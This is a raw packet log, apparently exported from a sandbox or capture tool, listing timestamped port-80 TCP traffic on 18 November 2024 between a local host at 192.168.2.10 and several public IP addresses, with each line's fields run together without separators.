                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.572609901 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.580477953 CET805018234.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.580704927 CET5018280192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.588514090 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596055031 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596142054 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596246004 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.596271992 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.603769064 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.604259968 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.629043102 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.629345894 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.638571978 CET805018318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:13.639337063 CET5018380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.242816925 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.247899055 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.247992992 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.248141050 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.248157978 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.253123999 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.253329039 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.568742990 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.568945885 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.574595928 CET805018434.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.574672937 CET5018480192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.585119963 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.590596914 CET805018618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.593787909 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.593899965 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.593924999 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.598769903 CET805018618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.598964930 CET805018618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.910712957 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.914050102 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.919536114 CET805018544.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.921762943 CET5018580192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.927792072 CET5018780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.932636023 CET805018713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.933845997 CET5018780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.933971882 CET5018780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.933990002 CET5018780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.938934088 CET805018713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:14.938947916 CET805018713.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.432203054 CET805018618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.432694912 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.438260078 CET805018618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.439321041 CET5018680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.445898056 CET5018880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.449745893 CET5018780192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.450737000 CET5018980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.450949907 CET805018847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.452316046 CET5018880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.452410936 CET5018880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.452442884 CET5018880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.455733061 CET805018913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.457240105 CET5018980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.457272053 CET805018847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.457300901 CET805018847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.457448006 CET5018980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.457465887 CET5018980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.462325096 CET805018913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:15.462380886 CET805018913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.907134056 CET805018913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.907702923 CET5018980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.913115025 CET805018913.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.913182974 CET5018980192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.920797110 CET5019080192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.925692081 CET805019035.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.925837040 CET5019080192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.925926924 CET5019080192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.925926924 CET5019080192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.930804968 CET805019035.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.930826902 CET805019035.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.941884995 CET805018847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.942090988 CET5018880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.947546959 CET805018847.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.947650909 CET5018880192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.954077959 CET5019180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.959001064 CET805019113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.959209919 CET5019180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.959209919 CET5019180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.961697102 CET5019180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.964131117 CET805019113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:16.966892004 CET805019113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.761308908 CET805019035.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.761564016 CET5019080192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.766895056 CET805019035.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.766948938 CET5019080192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.777333021 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.782468081 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.782541037 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.782712936 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.782737970 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.787619114 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:17.787653923 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.387428999 CET805019113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.387852907 CET5019180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.393214941 CET805019113.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.393362045 CET5019180192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.401510954 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.406414986 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.406490088 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.406558037 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.406599998 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.411442995 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:18.411458015 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.078608990 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.101706028 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.107346058 CET805019318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.107398033 CET5019380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.112607002 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117618084 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117712975 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117769957 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.117784977 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.123814106 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.123832941 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.248840094 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.249016047 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.254347086 CET805019218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.254455090 CET5019280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.263633013 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279548883 CET805019518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279623985 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279768944 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.279788971 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.288939953 CET805019518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.288953066 CET805019518.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.449707985 CET5019580192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.452744961 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457714081 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457798004 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457920074 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.457938910 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.462759972 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.462845087 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.772728920 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.794004917 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.799952984 CET805019444.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.800051928 CET5019480192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.805905104 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.810894012 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.810962915 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.811064959 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.811077118 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.816080093 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:19.816093922 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.297403097 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.298496962 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.304075956 CET805019618.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.304194927 CET5019680192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.364990950 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.373481035 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.373547077 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.374056101 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.374082088 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.382584095 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.383112907 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.478382111 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.479429007 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.484757900 CET805019718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.484812975 CET5019780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.492047071 CET5019980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.497030020 CET805019947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.497101068 CET5019980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.497188091 CET5019980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.497205973 CET5019980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.501965046 CET805019947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:20.503463984 CET805019947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.204001904 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.204237938 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.209387064 CET805019834.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.209706068 CET5019880192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.218357086 CET5020080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.223364115 CET805020018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.223460913 CET5020080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.223618984 CET5020080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.223634005 CET5020080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.228423119 CET805020018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.228683949 CET805020018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.895389080 CET805020018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.895580053 CET5020080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.901503086 CET805020018.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.901583910 CET5020080192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.910228968 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.915147066 CET805020135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.915235996 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.915361881 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.915385008 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.920176029 CET805020135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.920188904 CET805020135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.977511883 CET805019947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.993060112 CET5019980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.999126911 CET805019947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:21.999190092 CET5019980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.029963970 CET5020280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.035005093 CET805020218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.035068989 CET5020280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.037231922 CET5020280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.037446976 CET5020280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.042032957 CET805020218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.042288065 CET805020218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.720665932 CET805020218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.757240057 CET805020218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.759903908 CET5020280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.769663095 CET805020135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.824661016 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.891814947 CET805020135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:22.893750906 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.349652052 CET5020280192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.350794077 CET5020180192.168.2.1035.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.357589960 CET805020218.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.358520031 CET805020135.164.78.200192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.393980026 CET5020380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.399274111 CET805020354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.399447918 CET5020380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.399864912 CET5020380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.399879932 CET5020380192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.402230024 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.406371117 CET805020354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.406384945 CET805020354.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.408673048 CET805020434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.408844948 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.409219027 CET5020480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:23.409238100 CET5020480192.168.2.1034.211.97.45
